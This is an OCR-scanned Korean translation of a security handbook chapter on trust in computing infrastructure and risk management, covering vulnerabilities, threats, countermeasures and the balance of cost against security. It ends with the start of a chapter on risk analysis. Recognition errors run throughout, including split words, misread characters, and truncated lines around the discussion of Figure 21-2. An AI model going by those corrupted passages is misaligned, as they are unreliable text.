신뢰 체 계 의 전개 방법 을 서 술한《 신뢰 설 비 사용지 도서 작성 지 침》과《 신뢰 설 비 관리 리 해 안 
내서》가 있다. 지도서의 한 대목은 다음과 갈다. 

신뢰설비지 침에는 체계들의 신뢰설 비 관리기능들을 문서화하는것과 관련된 훌륭한 관례 
들이 제시되여 있다. 

《신뢰설비관리》는 안전체계구성，관리 및 운영을 위하여 리용되는 행정경영절차， 
역할, 기능(즉 명령，프로그람，대면부들), 특권들과 자료기지들로 정의된다. 

체계가 안전하다고 믿지만 말고 체계가 전개되는 설비를 믿음직하게 관리하여야 한 
다. 군대식사고를 나무라지 말고 상업체계나 경로기와 갈은 망구성부분들을 각성 있게 
관리하여 야 한다는것 을 알아 두라. 

이런 리론들과 여러가지 시험방법들은 제한성이 있다. 그러므로 언제나 실천에 적용 
되지 는 못한다. 그러 나 일 반적 으로 기준에 의거하면 신뢰성 평 가시험 에서 높은 성적 을 얻 
게 된마. 

신뢰를 보장하는 문제에 대한 또 한가지 견해는 위험요소들을 가능한껏 제거하며 나 
머지는 그대로 두는것이다. 체계와 망들을 포함하여 위험요소가 없는것은 없다. 위험요소 
들을 가능한껏 없애고 나머지를 그대로 두게 되는것은 모든 위험요소들을 다 제거하자면 
비 용이 너 무 많이 들기 때 문이 다. 모든 위 험 요소들을 설사 다 제 거할수 있 다고 하더 라도 
보통 그 모든 위 험 요소들을 절대 적 으로 다 식 별할수는 없는것 이 다. 

신릐가 왜 중요한가 

신뢰 와 신뢰 성 이 왜 중요한가 하는것 을 리해 하기 는 쉽다. 필 자가 찾은 전반적 견해 를 
표현하는 가장 좋은 방법은 Francis Fukuyama 가 쓴 책 《신뢰，사회적 미덕 및 번영의 창 
조》에 있다. 아래에 인용한 말은 생활에서 우리가 하는 모든것에 그리고 보안을 비롯한 
콤퓨터 및 망작업에서 우리가 하는 모든것에 적합한것 같다. 
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나라의 복리와 그 실현능력은 유일하게 지배적인 문화적특성 즉 해당 사회에 고유한 4 
뢰수준에 의하여 제약된다. 

기업체들의 복리와 그 실현능력은 그 하부구조들의 유일하게 지배적인 특성과 그것 
들이 의거하고 있는 특성 즉 고유한 믿음의 수준에 의하여 제약된다. 사람들이 자기의 
하부구조를 믿지 않는다면 기대하던 모든것을 잃게 된다는것을 알아 둘 필요가 있다. 탁 
상형콤퓨터를 생각해 보라. 그것을 믿을수 없다 하더라도 그것을 리용하면 얼마나 편리 
하겠는가. 

1990년 철 학박사학위신청 자로서 David Cheriton 박사는 다음과 같이 평 가하였 다. 

분산형체계들의 제한성은 a 성능에 있는것이 아니라 신뢰에 있다. 

Cheriton 의 말은 빵구이 기계 를 비롯한 모든 대상이 콤퓨터와 필요한 망장치를 가지 고 
있어 생활에서 외부의 모든 대상과 련결되여 있는 오늘의 시대에 잘 적용되는 말이다. 

Robert Morris 의 다음의 인용문은 이 착잡해 지는 복잡성의 호상접속의 현 실태를 아 
주 명백히 설명하여 주고 있다. 즉 

대충 짐작해 보아도 서로 접속되여 있지 않은것이란 없다. 

이것은 정말 믿기 어려운것이다. 사람들은 자기들이 어떤 사람들이라는것，자기들이 
가지고 있는것 그리고 자기들이 알고 있는것들을 믿을수 있는 근거는 고사하고 알지도 
못하는 상대들에게 나날이 더욱더 의탁하고 있는것이다. 신뢰는 점점 더 중요한것으로 
되 고 있다. 그러 나 대부분의 개 별적사람들과 기관들은 재부를 잃어 버리거 나 양도하게 
되는 경우에야 신뢰를 리해 하고 고맙게 여기게 된다. 

왜 사람들이 신릐하는가 

앞에서 론의되 였지 만 사람들이 신뢰하게 되 는데 는 많은 근거 가 있 다. 대부분의 사람 
들이 신뢰 성 의 그 어 떤 근거 도 중시해 야 된 다는데 대 하여 리해하지 못한다는것 을 알 필 
요가 있다. 우리들중의 대부분은 믿게 되는데 그것은 눈먼 믿음이 다. 근거는 아래와 갈은 
것일수 있다. 

• 《일은 제대로 되고 있다》라고 믿을수 있는 근거 

• 반대의 증거가 없는것 

• 공동체의 다른 사람들로부터 받게 되는 부분적 인 증거 

더우기 세계의 서로 다른 문화를 가진 사람들의 특성은 우선 신뢰하고 다음에 의문 
되는것이 있으면 질문하는것이다. 이것은 흔히 그렇지 않은 경우가 있기때문에 혼란을 
주게 된 다. 그러 나 그것 은 각이한 문화들에 서 중요한 특성 으로 된 다. 
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왜 사람들이 믿지 말아야 하는가 

신뢰의 중요성을 보여 주는 가장 중요한 방법은 아마도 불신 즉 신뢰，믿음 혹은 확 
신의 결핍과 의심 혹은 의 혹에 대 하여 이 야기 하는것 이 다. 

놀라운것 은 사람들이 접 수하는것의 대 부분은 그들로서 는 힘 에 부치 는것 이 라는것 
이다. 실례를 들어서 그 문제의 한 측면 즉 복잡성을 고찰하라. Marcus Ranum 은 복잡 
성 에 대 하여 깊 이 생 각하면서 Web 열 람기 들자체 가 복잡성 을 처 리 하기 위한 도구들로 
되 였 다고 말하고 있다. 대 부분의 열 람기 들이 지 원 하는 ( HTTP , FTP , Telnet 등과 같은) 
무수한 규약들을 처리해야 하는 복잡성을 숨기는 일을 대부분의 열람기들이 말고 있 
다는것을 생각해 볼 필요가 있다. 우리들중 얼마나 많은 사람들이 계속 불쑥불쑥 나 
타나는 새로운 최신 Web 응용들의 모든 특징들과 매력들에 대하여 알고 있는지 Ranum 
은 묻는다. 아마도 그것을 아는 사람은 그것을 코드화하는 사람이라고 그는 말한다. 
더우기 그런 규약보안의 세부는 발표되지 않았으며 판본마다 다르다. 여기에 활력을 
주는 실례로서 Netscape 열람기 4. 06관에 나타난 《Smart Browsing 》특징에 대한 이런 
내용을 생각해 보라. 

Netscape Communicator 회사가 내놓은 Communicator 4.06 은 사용자가 지금. iliL 있는 문 
서 와 관련 이 있는 싸이 트들을 건의 하는 봉사의 전단인 《 관련내 용》이 라는 표시 가 달린 새 로 
운 아이콘에 의 하여 조종되 는 새 로운 특징 인 《Smart Browsing》 을 포함하고 있다. 이 특성 을 
실현하자면 사적비밀파 관련된 수많은 잠재적인 우려들이 생기게 된다. 이런 문제들을 여기 
서 조사하였다. 

특히 사용자가 web 을 탐색 하는동안에 방문하는 URL 들은 Netscape 의 봉사기 에 기 록된다. 
이 자료기록들은 쿠키와 접속되여 사용될 때 지어 이름, 주소 그리고 일부 경우에는 전화번 
호까지 포함하여 개별적인 Web 사용자들의 확장서류를 구축하는데 리용될수 있다. 

이 문제 에서 난관에 봉착하는 경우에는 PKI 와 Windows 2000과 관련된 신뢰문제들을 
다 다쳐 보려고 하면서 더욱더 골머 리를 앓을수 있다. Windows 2000으로 오래 쓸수 있 
는 신뢰 모형 을 구축하고 유지 하기 위 한 방도문제 는 Windows 2000자체 에 대 한 신뢰 방도 
탐구문제와 비교해 보면 아무것도 아니라는것을 알아야 한다. Windows 2000이 2,700만 
혹은 4,000만의 코드행을 가지 고 있기때 문에 그 절반 또는 그이상이 초기출하판에서는 
없다고 한다. 보안과 관련된 바그를 퇴 치한 수자는 아주 놀랍다. 

복잡성과 규약문제들이 이렇다 해도 대부분의 사람들과 기관들은 자기들의 하부구조 
들을 믿어야 할 리유는 없는것이다. 하부구조들을 믿지 못하게 되는것은 지역문제와 관 
련된다. 신뢰성 이 있는 하부구조들은 거의 없다. 

우리가 매 일 겪게 되는 고의적 인 기만에 대하여 생각해 보게 하는 문제들이 계속 제 
기 된 다. 이 런것 들에는 비 루스，월 및 트로이 목마들, 우리 에 게 밀 려 드는 Bugtraq 와 같은 
일상보안설교와 공격자들의 적의가 속한다. 약삭빠른 경쟁자들은 기업이나 전쟁에서 있 
을수 있는 모든 기회를 다 리용하여 사람들을 속여 넘기려 한다.《손자병법》을 참고자 
료로 건의한다. 기 업경쟁 자들이건 하부구조공격 자들이 건 적수들은 온갖 기회 에 대 상을 
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기만할것 이 라고 보아 진다. 

하부구조를 믿을수 있는 근거는 무엇인가. 이에 대해서는 대체로 오직 한가지 답변 
이 있을뿐이다. 즉 우리는 그런 질문을 고려하지 못하였다. 그러나 하부구조를 믿을 근거 
를 찾지 못하고 있다. 어떤 사람들(그리고 모든 기관들)은 자기들을 기만하고 있다. 

하부구조의 보안 


이 문제의 본질을 보자. 물어 보아야 할 질문이 한가지 남았다.《여기로부터는 어디 
로 가야 하는가?》이 질문이 어렵지 않다고 말하자는것은 아니다. 하지만 어떻게 자기 
의 하부구조를 믿겠는가 하는것을 리해하기는 쉬우며 또 직관적 인것 이다. 대 답은 비교적 
단도직 입 적 이 다. 즉 

1. 신뢰를 엄는 문제를 위험관리의 련습으로 보라. 

2. 계획을 세우라. 

3. 그 계획을 실현하라. 

4. 계획의 효과성을 평가하라. 

5. 필요하면 그 계획을 수정하라. 

6. 1단계로 돌아 가라. 

이것은 성공할수 있는 확고한 방법이다. 다시 말하여 담보가 있는 방법이다. 지령들 
을 집행하는 사람의 통제밖에서 일어 날수 있는 모든 사고들(즉 회사가 기업을 못하는 
것)도 방지할수 있기 때 문에 필 자가 경 험한데 의하면 이 방법 이 실패한적 은 없 었 다. 그것 
은 이 방법 이 바로 문제 해 결 의 기 본모형 이 기 때 문이 다. 이 방법 은 위 험 관리 로부터 시 작하 
여 구체 적 인 세 부문제 들을 해 결할수 있 게 한다. 


우 I 험관리초보 


위험관리는 단순히 방정식을 푸는 하나의 련습문제풀이로 볼수 있다. 그림 21 — 1은 
위 험 관리공정 이 어 떻게 작용하는가 하는것을 보여 주는 단순한 그림 이 다. 몇개의 정의 들 
이 보안으로부터 시작하여 이 공정의 작용을 읽어 볼수 있게 할것이다. 사전 《American 
Heritage Dictionary 》 는 보안에 대하여 《위험에서 벗어 나기，안전》이라고 정의를 주고 
있 다. 

이것 을 출발점 으로 삼을 때 다음과 갈은 첫 난관이 제 기된다. 즉 콤퓨터하부구조에 
대한 위험과 안전을 어떻게 정의하는가. 몇가지 용어부터 시작하자. 

취약성, 위협, 위험 및 대응조치. 널리 통용되는 보안용어들을 리용하여 자체참고용목 
록을 작성할수 있 다. 
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(I 달불가능) 낮음 보안 높음 


그림 21-1. 비용과 보안의 균형 

• 취약성 리용당할수 있는 약점. 다시 말하여 체계보안의 절차，설계，시행，내부 
통제 조치 등에서 리용당하여 보안방책 을 어 기게 할수 있는 약점 

• 위협 취 약성 을 리용할수 있는 대상 혹은 사람. 다시 말하여 자료의 파괴，개 방， 
수정 혹은 봉사거부의 형태로 체계에 손상을 입힐수 있는 잠재력을 가진 임의의 
조건 혹은 사건 

• 위험 특별한 사건발생 의 가능성 혹은 특별한 사건발생 으로 입 는 손실 

• 대응조치 특별한 취약성이 리용당할수 있는 가능성을 경감시키거나 특별한 취 
약성 이 리용당하여 생길수 있는 파괴 를 경 감시키 는 절 차 혹은 수법 . 다시 말하 
여 하부구조의 취 약성 을 경 감시키 는 기 교，행 동，장치 혹은 다른 조치(이 모든것 
들은 다 위험요소들이다) 

이 방법은 존재하는 취 약성들을 벌충하는 해 당한 대응조치들을 적용함으로써 위험을 
경감시키는데(단순히 조절하는데서가 아니라) 드는 비용을 위험을 당하는데서 보는 손실 
과 비교하는것이다. 

이 방법에 대한 또 한가지 견해는 비용의 관점에서부터 문제를 대하는것이다. 그림 
21_1에서는 비용과 위험의 호상관계를 보여 준다. 여기서는 또한 보안에 지출할 비용의 
최 적량을 어 떻게 결정하겠는가 하는것을 보여 준다. 그림 에서는 보안지 출을 위하여 계산 
해 낼수 있는 최 적량에 비한 보안의 실 비용을 도해 로 표시한다. 

아마도 사람들은 일부 난관들에 봉착하게 되 리 라는것 을 리해 하기 시 작할것 이 다. 공 
통적 인 용어들을 제정하는것 이 문제 로 될수 있다. 어 떻게 하면 이 용어들을 리용하여 하 
부구조보안과 관련된 복잡한 문제들을 잘 표현하겠는가 하는 생각으로 사람들은 공통용 
어들을 하나하나 골돌히 생각할수 있다. 

아래 의 세 개 념 들은 론리 적 으로 련관되 여 있으며 토론을 위하여 하나로 묶어 놓을수 
있다. 이 개념들을 리용하면 하부구조보안구축을 다음과 갈은 세 단계로 간단히 표현할 
수 있다. 

1. 취 약성을 식별하라. 

2. 취 약성 을 리용할수 있는 위 협 요소들을 식 별 하라. 


335 




3. 어떤 위협 이 이 취 약성 을 리용할수 있다는 가능성 을 경감시키기 위한 대 응조치를 
설계 하고 실현하라. 


이런 보안문제들은 매우 단순한것 갈다. 그러나 대부분의 하부구조들은 너무나도 각 
이한 구성부분들로 이루어 져 있으므로 이 하부구조보안구축안을 실현하기가 어려운것이 
다. 그러 나 이 안은 이 단계 들을 반복하여 리용하는 반복공정 이 다. 리 상적 인 정 황에 서 는 
반복공정 에서 매 기 반구성부분들에 대 응하는 위협，취 약성 과 대 응조치를 고려하게 된다. 
경험 에 의하면 하부구조의 매 구성부분들을 이 런식으로 조사하지 않으면 하부구조의 보 
안을 보통 실현할수 없게 되는것 이 일쑤이 다. 

그러나 실천적견지에서 말하면 이런 안은 가장 작은 기관들을 제외하고는 모든 기관 
들에서 실현할수 없는것이다. 이 보안구축공정을 거치는동안 기관의 기업을 중지한다고 
생 각해 보라. 결 국 하부구조는 기 관의 기 업 요구를 지 원 하기 위하여 있는것 이 지 결 코 그 
반대 로는 되지 않는다. 

이 규범에 대하여 유일하게 례외로 되는것은 훌륭한 보안이 설계의 목표이며 그에 
따르는 자원담보가 있는 경우이다. 실례로 최신부분품이나 완전히 새로운 하부구조가 설 
치되고 있는 경우에 그런 기회가 불가피하게 있게 된다. 

대부분의 사람들은 이 런 보안은 군대 에서나 실현할수 있는것 이 라고 믿는것 같다. 그 
러 나 대부분의 경제분야들이 자기의 정보재부를 보호하는 문제에 큰 관심을 가지고 있으 
므로 보안에 대하여 심중하게 대하고 있다. 이런 대상들에는 대부분의 산업，공업 및 교 
육기관들이 속한다. 

기관의 기업을 멈추지 않으면서 이 위험관리실행을 어떻게 완성하겠는가 하는데 대 
한 실 천적문제 를 푸는 방법 에 대 하여 보자. 

분석과 정량화. 취 약성 들을 찾아 내 여 퇴 치하는데 서 기 본은 분석 과 정 량화라고 말하 
여도 과언은 아니다. 이것은 거의 모든 경우에 대부분의 기관들이 기업적 혹은 기술공학 
적견지에서 보안을 대 하지 않는 사정과 관련된다. 더우기 많은 기 관들이 제기 되는 문제 
들을 지어 확인해 보지도 않고 보안기술을 서둘러 사 들이려 하고 있다. 이 런 생각은 함 
정에 빠지는것이라고 말하고 싶다. 

상업적 및 기술적인 문제성들을 해결하는데 경험 있는 사람들은 오직 분석 및 정 량 
방법 에 만 의거하는것 이 다. 제 기된 문제의 구체적 인 정형 을 료해 한 다음에는 그것 을 분석 
하고 결함퇴 치의 첫 단계 로서 분석결과들을 정 량화하여 야 한다. 

그러면 취약성，위협 및 대응조치들을 어떻게 분석하고 정량화하겠는가. 정보체계들을 
보안하는 규률을 잘 세 우기전에 는 이 런 사업 을 진행할수 없을것 이 다. 사실 이 런 문제는 충분 
히 리해되는 문제이다. 필요한 도구들과 해당한 기술은 준비되여 있다. 그러나 어느 도구도 
완성된것이 없다는것을 알아 두는것이 중요하다. 어떤 경우에나 아주 성공적인 방법들에서는 
우리의 기본용어목록에 수록되여 있는 개념의 또 하나인 용어 《위험》을 사용하고 있다. 

여기서부터 지어 일보라도 더 전진하기전에 조심이라는 말을 해 두는것이 적당할것 
이다. 
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위험을 정량화하는것은 힘든 문제이다. 사실 이 분야에서 적합한 방법들을 개발하려는 



모든 시도들은 지 난 수십 년동안 완전히 실폐 하여 왔다. Donn Parker 는 자기 책 《콤퓨터 범죄 와 
의 싸움》 (Fighting Computer Crime, 1998년판)에서 이런 실패들이 어떻게 생겨 났는가 하는것 
에 대 하여 정 확히 설명 하고 있다. 임의의 측정척 도를 리용하여 협소하게 규정된 분야에서 특 
정한 등급들을 정 량화하는데 서 성 공할수도 있 다. 그러 나 이 등급들을 특히 매 우 널 리 분포된 
현대의 큰 기 관규모에서 임의의 동일한 척 도를 리용하는 다른 등급들과 일 치시키는것은 불 
까농하다는것을 경험은 보여 주고 있다. 

우리는 정량적위험평가방법들을 리용할수 있다. 그러나 경험이 보여 주는바와 같이 많 
은 분야들에서 질적평가의 어떤 형태를 리용하기를 그만두게 될것이다. 일반적으로 보안프 
로그람의 평 가를 생 각하여 보라. 사람들은 보안프로그람이 해 당기 관을 위하여 자기 역 할을 
얼마나 잘 수행하는가에 대한 의견에 기초하여 평가하려고 할것이다. 틀림없이 이런 평가는 
《한심한것》으로부터 《훌륭한것》에 이르기까지의 질적평가등급들을 필요로 하게 된다. 

위험요소들의 처리. 위험요소가 있을수 있다는데 대하여 말할 때마다 사람들은 긴장해 
진다. 그것은 보안해야 할 체계들과 망들이 있기때문이다. 위험요소가《있을수 있다》는데 
대하여 당황해 할 필요는 없다. 위험요소들을 정 량화하려는 시도들이 나타나고 있다. 특히 
보안과 관련된 사업들을 지원할 예산을 세울것을 요구할 때 이런 시도들이 뚜렷해 진다. 경 
영 진과 통계원들은 공론에 귀 를 기 울이지 않으며 기 술자들과 기 사들은 세 부적 인것 들을 요 
구한다. 누구나 다 일할수 있는 구체적 인 자료를 요구한다. 여기 에 어 려운 문제 가 있다. 

무거운 책임을 지고 있는 체계관리자 또는 망들은 많은 시간과 필요한 자료들을 받 
은 조건에 서 보안문제 들을 인증할수 있다. 발생 가능성 에 의하여 인증된 보안문제 들의 효 
과를 정 량화할 능력 에 대 하여 아직 론의하지 못하였 다. 이 문제 는 곧 론의하게 된다. 이 
에 앞서 위험요소들을 어떻게 분석하고 정량화하겠는가 하는 문제를 간단히 보자. 

무엇보다먼저 문제 에 대 한 정 확한 정의，분석 및 정 량화를 모색해 야 한다. 또한 문제 
를 해 결 하는데 서 경 험 이 있 는 사람은 언제 나 문제 해 결 목표들에 대 하여 문의 한다. 문제 해 결 
목표들을 규정하는 좋은 방법 은 예 견하는 완성정 도에 따라 목표들을 구분하는것 이 다. 즉 

• 필요한것. 필요한 요소들은 문제해결에 요구되는 근본요소들이다. 이 요소들은 
근본적 인것，중요한것，의 무적 인것 또는 전제 적 인것 으로 볼수 있다. 

• 충분한것. 충분한 요소들은 해결해야 할 문제를 적합하고 충분하고 만족스럽고 
또한 완전한것으로 되게 하여 해결할 문제를 완성시키는 보충적인 요소들이다. 

상업 기 관，산업 기 관 및 교육기 관들의 보안경험 이 보여 주는바와 같이 합리 적 인 보안해 
결책의 선택에서 기본은 필요한것과 충분한것을 배합하는 기업적 및 기술적예술에 있다. 
보안분야에서 이 런 방법 이 과학적 인것은 아니 다. 그러 나 높은 수준의 보안은 엄밀한 수학 
적증명과 변량을 극력 제한하는 철저한 규칙들을 적용할 때에만 실현된다. 그렇지만 돈을 
벌자면 돈을 씨 야 하는것처 럼 보안을 보장하자면 비용을 들여 야 한다. 이 런 대응조치들이 
너무 비싸다고 하여 걸써 대한다면 필요한 대응조치들을 구태여 인증할 필요가 없다. 

보안에 대한 지출은〈〈 도로상태에 맞게 고무다이야를 만드는 경우》와 갈다. 보안과 관 
련한 믿 음직한 자료값은 거 의 없 다. 이 런 사정 으로 하여 하부구조구성 부분들의 보안을 
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잘 조직하고 시험하는데 필요한 초과인원들의 작업주수에 대하여 체계관리자 또는 망관 
리자가 경영진에 정확하게 설명하려고 할 때 특별히 따분하게 된다. 경영진은 보고된 정 
보자료들이 기업에 가치가 있다는것을 흔히 정량화할수 있다. 그러나 체계관리자 또는 
망관리자가 이 평가값들을 보안예산에 믿음직한 수자로 직접 반영하는 문제는 거의 불가 
능한것 이 다. 보안부문에 대 한 오랜 경 험을 가진 박식한 사람인 Bob Courtney 의 다음의 
말에서 좀 위안을 받게 된다. 즉 

보호해 야 할 가치만큼 보안에 지출하라. 

문제 는 가치 가 얼 마나 있는가 하는것 을 결정하는것 이 다. 대 답인즉 비 용과 위 험 사이 
의 알맞는 균형을 보장하는것이다. 그림 21 — 1에서는 이 균형이 실천적으로 어떻게 이루 
어 지는가에 대하여 도해로 보여 주었다. 

보는바와 같이 보안량과 그 비용(위험요소들 혹은 보안의 결핍)사이의 균형점을 
《 달콤한 점 》 (sweet spot ) 으로 정의한다. 달콤한 점의 울타리지역을 포함하는《 신중성구 
간》이라는 표시를 한 네모칸이 있다는것을 알아 두라. 이것은 보안량과 그 비용이 균형 
이 맞는 구간이 다. 이것은 위 험과 보안수준을 견지 하기 위하여 지 출되는 비용을 완전하 
게 균형잡는것 이 불가능하지 는 않다 하더 라도 매 우 어 렵 다는 사실 에 기 초하고 있 다. 다 
시 말하여 위험요소들 혹은 큰 비용들에 대해서는 널리 통용되는 표준에 기초한 즉시적 
인 평 가에 앞서 위 험량에 대 한 분석 이 있 게 된 다. 

실례로 모든 비루스들을 몽땅 잡아 내는 비루스스캐너는 살수 없다. 그러면 더 많은 
위험 이 있게 된다. 다른 한편 실행할수 있는것도 엄격히 제 한하는 보수적 인 방책밑에서 
운영하는 경우도 있다. 그러면 비루스가 그러한 환경에서 퍼지는 길이 훨씬 더 적어지기 
때문에 그만큼 위험은 더 적다. 

이에 대한 또 한가지 생각은《신중성구간》이 위험요소들과 지출들이 《적당한》지 
역 이 라는것 이 다. 일 반적 으로 말하여 《 달를한 점》의 오른쪽 위 험곡선에 있는 점 를| 지 
나치게 지출한것이다(필요한것보다 더 많은 보안).《달를한 점》의 왼쪽위험곡선에 있는 
점 들은 너 무 적 게 지 출한것 이 다(필요한것 보다 적 은 보안). 

제한. 그림 21_1을 주의하여 따져 보면 그 어 떤 곡선도 령 으로 되 지 않는다는것 과 
두개의 령이 있다는것을 알수 있다. 제한에 관한 두가지 중요한 점들은 다음과 갈은것들 
을 말해 준다. 

• 령점들을 정의하여야 한다. 절대적인 령위험을 가지는 하부구조들과 절대적인 
령비 용이 드는 보안은 존재하지 않으며 창조될수도 없다. 

• 최 대 값을 정 의하여 야 한다. 가지 는것 만큼 지 출할수 있 다. 그러 나 불안정한 하부 
구조들은 여 전히 존재한다. 

간단하게 생각하라. 일반적으로 적게 지출하면 많은 위험을 당한다. 비결은 접수될수 
있는 위험수준을 식별하는것이다. 그리고 이 지역은 그림 21_1에서 신중성구간으로 표 
시된다. 이 모든것은 다음과 갈은 질문을 제 기한다. 어떤것 이 적 합한지 어 떻게 아는가 그 
리 고 존재하는 위험요소들을 어떻게 결정 하는가. 오래동안 써 오는 한가지 방법을 보자. 

자작도구. 그림 21_2는 그림 21_1의 X 축(보안수준)에 여러가지 위험평가방법을 보 
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X 축(보안수준)아래의 보충정보는 명백한 표시들 즉 대안，우점 및 약점이라는 표식 
• 한 네모칸안에 있다는것을 알아 두라. 이 네모칸은 그림 21_1에서 임의의 지역이 
- 표시를 한 네모칸(도해의 바닥에 수평으로 기록된)처럼 흔히 말하는 위험구간들을 
싼다. 이 구간들(도해의 밑에 있는 개개의 위험구간들의 오른쪽옆에 기록된)은 각이 
리험 요소평 가기 준에 의하여 결정 된다. 

실례로 지출기준의 위험요소평가기준들을 보라. 위험을 얼마나 허용할수 있겠는가 하는 
' 평가해 보면 령지출과 자원랑비가 네모칸밖에 있다는것을 알수 있다. 령지출은 위험요 
거률이 너무 낮으며 자원랑비는 위험요소제거률이 너무 높다는것으로 볼수 있다. 이것 
4로 예견한 그대로이다. 실현방식기준의 위험평가기준들을 리용하면 명확한 선택들이 
획적임(정량하기 쉬운것)으로부터 시작하여 응당히 관심함，고심함에 이르기까지의 범 




정 량화방법을 찾았다 해도 적용하기 어 려운것들이다. 이 런 서:^^ 위험분석에 대한 정 량적 인 
방법을 보장하려는 베모.가 아닌것으로서 위험에 영향을 미치는 모든 요인들이 어떻게 호상작 
용하는가 하는것을 리해하는데 필요한것 이 아니 다. 사실 X축(보안수준)밑 에 기록된 위험평 가 
기준들이 실제적으로 량적측정값과 질적측정값들의 혼합이 라는것을 알수 있다. 

무엇이 중요하며 그것을 어떻게 측정할것인가 하는것을 물어 보는것은 가장 중요한 
출발점이다. 질문을 제기한 이상 리용할수 있는 각이한 위험평가기준들을 고려해 볼수 
있다. 연구해 야 할 문제들이 많지만 그중에서도 가장 중요한 문제는 특정한 기관과 관련 
된 문제 이 다. 

한 기관의 구체적실정에 맞는 응당한 관심，일반적인 실천 및 규정준수의 표준들이 있 
다 .이 표준들은 산업분야의 고유한 측정값과 모든 기관들에서 공통적인 측정값의 관점에 
서 위험평가기준들로 리용될수 있는것들이다. 해당 산업에 대한 검열과 평가를 진행하여 
온 검열관들과 전문가들은 한 기관에 중요한것으로 되는 해당 산업에 맞는 표준들을 제공 
할수 있으며 또한 흔히 응당한 관심과 일반실천이라고 보는것들을 제공할수 있다. 실례로 
국방관련계약과 같은것을 담당한 산업부문들에서는 NT , UNIX , 경로기 등과 갈은 특별한 
체계들을 보호하기 위하여 보안산업 이 할 문제와 관련한 폭 넓은 협정들을 리 행 해 야 한다. 

기관들에서는 또한 자기 기관의 경영방식과 문화에 맞는 위험평가기준들을 찾아 내 
야 한다. 물론 누구나 위험평 가공식들과 그것을 집 행하는 모형들 그리고 그림 21_2에 제 
시 한대 로 이 모든것 을 자동적 으로 수행하는 도구들을 찾고저 할것 이 다. 그러 나 보안에 서 
지금 적용되는 분석과 정량화의 최첨단수준은 모든것을 마우스로 다 하는 방법과는 완전 
히 다르다. 마우스로 하는 방법 들을 가지 고서 는 보안의 분석 과 정 량화문제 를 다는 수행하 
지 못한다. 현재 사용되는 대부분의 도구들은 본질상 정교하게 작성된 계산표들이다. 그 
러 나 이 도구들은 정 량적 인 위험평 가방법들의 명목이 나 유지할 정도로 방조를 준다. 

현재 위험평가는 창조적능력과 경험이 있는 보안전문가들이 시끄럽고 하찮은 세부문 
계 들을 하나씩하나씩 처 리 해 야 할 문제 를 많이 안고 있는 복잡한 문제 이 다. 

결론적인 문제 

복잡한것 이 틀림 없지만 모든 기관들에서는 자기의 하부구조보안공정을 잘 파악하고 
널리 실천해 나가고 있다. 비결은 계획을 가지고 기업의 관점에서 정보체계와 망하부구 
조들을 대 하는데 있 다. 수행할 단계 들과 적 용할 방책 들이 있다. 다시 말하여 오래 동안 검 
증된 하부구조보안을 처 리하는 방도가 있 다. 

1. 하부구조들에서 보게 되는 취 약성들과 위협들을 식별하라. 

2. 취약성들과 위험성들을 성문화하라. 

3. 기 관의 기 업 상요구를 반영하여 위 험 요소들을 등급별 로 구분하라. 

4. 대응조치들을 식별하고 그 균형을 맞추라. 

5. 위 험요소목록을 작성 하기 위하여 공격계 획 을 작성하는데 착수하라. 

6. 가장 큰 위 험 요소들을 결 합시키 는 사업 에 오늘 당장 착수하라. 
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신뢰구축 


하부구조에 대 한 신뢰 구죽사업 이 사람들이 잘 리 해하는 공정 이 라는것 을 알면 독자들 
은 기뻐 함것 이 다. 신뢰를 쌓는 문제를 문서로 만들어 널리 실시 하고 있다. 사실 문서에는 
실례들이 아주 많다. 신뢰구축에 대한 훌륭한 참고자료는《주요기관들로부터 배우기》 
라는 책에 있다. 참고자료가 정부문서 라고 하여 사람들이 무관심하지 않도록 하라. 그 자 
료는 주요사영부문과 정부기관에 의하여 홀륭하게 적용되는 공정에 기초한 좋은 참고자 
료이 다. 필 자는 이 모형 의 개 작판을 리용하여 보안평 가를 하였 다. 이 GAO 모형 은 확장되 
여 공정의 한 단계를 선행하는 일부 단계 들을 포함하게 되 였다. 이것은 실천에서 효력 
있는 기술의 일부로서 그림 21 — 3에 제시되였다. 

그림 21-34 살찌 보면 거기에는 반복되는 순환이 있다는것을 알게 된다. 모형의 
평가단계는 위험평가에로 확장되였으며 그것을 안받침하는 부분들은 다음과 갈다. 



그림 21-3. 신뢰구축계획 


• 법적, 규정적 및 기업적인 요구들 기관의 의무집행자세를 식별하는 공정(즉 기관 
이 어떻게 일해야 하는가를 결정하는 법조항 및 감시조항) 

• 자산 및 위험요소식별 기관에서 더 중요한 부분들을 갈라 내고 그 부분들의 재 
부에 대한 위협들을 색출하는 공정 

• 보안권고안들과 검 열 및 감시결과들 하부구조취 약성 식 별 공정 

하부구조의 특정한 구성 부분들에 대 한 신뢰 를 구축하면서 겪 은 세 부들은 또 하나의 
연구론문에 담을만한 이야기이다(그림 21_3에 제시된바와 같이). GAO 보고에 제시된것 
과 갈운 모형 대 로 위 험 요소들을 식 별 하여 경 감시키 는것 은 하부구조의 신뢰 를 구축하는 
확고하게 믿을수 있는 방법이다. 

※ 될수록 많이 참고할수 있게 하려는 목적에서 참고문헌들에서 URL 들도 주었다. 
Web 의 불안전한 특성으로 하여 URL 들은 때때로 변할수 있다. URL 이 동작하지 않는 경 
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우에 는 http :// www . google . com 과 같은 유능한 검색 기 구에 검색문자렬로서 참고자료제목을 
주면 해당한 폐지가 나타난다. 
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제 2 2 장. 위험관리와 분석 


케빈 헨리 

위험관리는 왜 문제로 제기되는가，위험관리를 하는 목적은 어디에 있으며 위험관리 
를 하면 어떤 좋은점이 있는가. 오늘날 지나치게 확장된 사업환경에서 《위험관리와 분 
석》이라는 말은 사람들이 늘 쓰는 또 하나의 류행어로서 《행정관리형》인간들을 늘 바 
삐 돌아 가게 하며 《기술형》인간들로 하여금 자기 사업을 제대로 하지 못하게 하는 하 
나의 류행적 인 경향으로 볼수 있다. 

그러나 위험관리는 집중적 이며 공고한 대응책과 계획작성전략의 기초로 리용되는 경 
우에는 회사에 커다란 리익과 자금절약을 가져다 주게 될것이다. 

위험관리는 효률적인 업무의 초석이며 있을수 있는 사고에 명백한 목표를 가지고 미 
리 예방대책을 세우는데 큰 도움을 준다. 많은 회사들에서는 위험관리의 중요성을 인식 
하기 시 작하였으며 위 험 총괄책 임 자 ( CRO : Chief Risk Officer ) 를 임 명 하고 있 다. 위 험관리 
가 회사내의 각 부서들의 주요 기능의 하나라는 인식도 자리잡히고 있다. 이 렇게 많은 
사람들의 노력 과 그 결과를 잘 조정 한다면 전체 적 인 씨 나리오는 더 욱 더 뚜렷 해 질것 이 
